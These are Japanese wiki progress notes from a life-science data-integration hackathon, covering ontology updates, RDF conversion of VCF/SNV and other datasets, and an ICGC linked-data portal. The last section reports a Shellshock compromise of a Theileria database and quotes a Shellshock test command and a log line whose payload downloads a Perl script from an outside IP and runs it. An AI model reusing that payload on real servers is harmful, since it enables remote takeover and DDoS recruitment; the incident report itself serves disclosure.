提供:TogoWiki
INSDC, MEO, MPO, MCCV などのオントロジー開発
- 培地オントロジーの更新(川島)
- 表現型オントロジー
- INSDCオントロジー更新(藤澤・真島)
- feature, qualifier, value の変遷の類型化 (真島)
- 東北メディカル・メガバンク (ToMMo) と日本人ゲノム情報
- バイオバンクデータのオントロジー整理(山下、河野、高月、伊藤)
- 理研BRC、東北メディカル・メガバンク、DBTSSのデータの統合の可能性についてミーティング
- DBTSS - 理研BRC → 細胞種で結べる
- 理研BRC - 東北メディカル・メガバンク → 短期的は難しいかも・・・、臍帯血、単核球
- 植物研究コミュニティで使用する統一用語を効率的に整備するためのシステム作り(Wikiページの作成とオプティマイズ)(市原)
- MediaWIkiの利用による機能拡張作業(php)
RDF化
- RNA-seq メタデータ -- 菅野・黒川グループ、(藤澤、河野)
- 疾患ヒトゲノム変異 (TSS、SNVデータ) のRDF化(鈴木、川島、河野、山下)
- TSSデータのRDF化
- 解析の記述
- SNVデータのRDF化
- DBTSS SNV RDF スキーマ
- SNV RDF
- vcf ファイルを RDF に変換するツール
- bio-vcf2rdf
- Francesco Strozzi, FALDO 対応、最終更新は2年前
- bio-vcf
- Pjotr Prins, FALDO 非対応?、割と活発に開発されている
- 問題点:位置情報がFALDOでない。prefixが書けない。テンプレートを使うと、値がないものがトリプルにならない(if 文で区別できる)。
- サンプルコードが動かない…
- jvarkit
- vcf ファイルを扱うライブラリ集?VCFTORDFがある。
- 746MB vcf file -> 4.56 GB, 1h (1.6GHz Intel core 2 Duo)
- biointerchange
- syapse
- Private company っぽい。W3C clinical genomics task force?
- sparql-vcf
- というか、BH13.13 で既に議論されていた…
- ユースケースとして、RDF 化したものを他のデータとも統合的に検索できる例を出したい
- ライフサイエンス〜創薬におけるセマンティック・ウェブの活用
- マイクロアレイとその関連情報のRDF化(伊藤・川島)
- がんゲノム ICGC Linked Data ポータルの開発 http://icgc.link/ (山中)
- (進捗90%) 現状、d3sparql に加えて Faceted Search 追加 >> 将来的に必要な Visualization を考える
- Faceted Search をモジュール化する。Open Refine の UI が参考にできる?
- (進捗20%) 外部ソースのRDFをポータルに含めて表示する:現在、BIO2RDFのHGNCのみ。他にどんなソースがあるか、日本人SNPsのデータは?
- 上記、VCFのRDF化で日本人SNPsのRDFデータが得られたら、これを参照できるようにしたい。
- (進捗00%) RDFデータを規約に従って修正、上記ポータルのレポジトリに公開
- [広告] Galaxy Workshop Tokyo 2015
- RefEx RDF化(川島・小野)
- NBRC菌株のBioSample ID取得に向けた作業(Taxonomy ID付け)(川島・真島・藤澤)
- GO 情報の追加(PDBe/SIFTS経由)(金城)
- mutant のアノテーションはどうなってる?
- SIFTS (@PDBe) のお勉強 -> given up!
- BH14.14/SemPDB? wwPDB/RDF をもうちょっとbiology-oriented にできないか?
- マウスの基本情報のRDF化作業(高月,伊藤)
- 細胞の基本情報のRDF化作業(高月、河野)
- CLOにそった、スキーマーの設計を行っている。
- BRCの細胞については、採取組織についてはUBELONを利用してマッピングする予定
- 細胞の提供者(人)の場合の国については、geonames.orgを利用するのがよいのでは?
- 細胞のデータについては、一部菅野研のデータと結ぶことが可能。
- 細胞データの病名については、わかる範囲で、ICD10や、OMIMとつなぐが、難病疾患については、ORDOとつないでいける
- 微生物データのデータ連携のフローの作成(高月)→次回のSPARQLthonに持ち越します。
- 遺伝研のコンソミックマウスについては、一部基本データー部分をRDF化
北大のTheileria Orientalis database
- おかげさまで現在,復旧しました。Theileria orientalis database
- 2012年8月にゲノムプロジェクトの成果として,論文発表と同時にシークエンスとアノテーションDBを公開
- 2014年の年末,DDoS攻撃に参加したためサービス中止,ネットワークから分離
- 2015年の1月,このデータベースを使った論文がNatureに出版されたが,ネットワークに接続するわけにはいかない。
- 原因: bash の脆弱性をつかれ,perlスクリプトが仕込まれていた。
- とりあえず復旧させたが,再構築を検討してます。アイディア募集中です!
- 脆弱性のテスト
env -i x='() { :;}; echo vulnerable' bash -c "echo this is a test"
132.239.152.97 - - [05/Oct/2014:22:38:31 +0900] "GET /g-integra/cgi-bin/gi_index.cgi?sp0=To HTTP/1.1" 500 622 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\""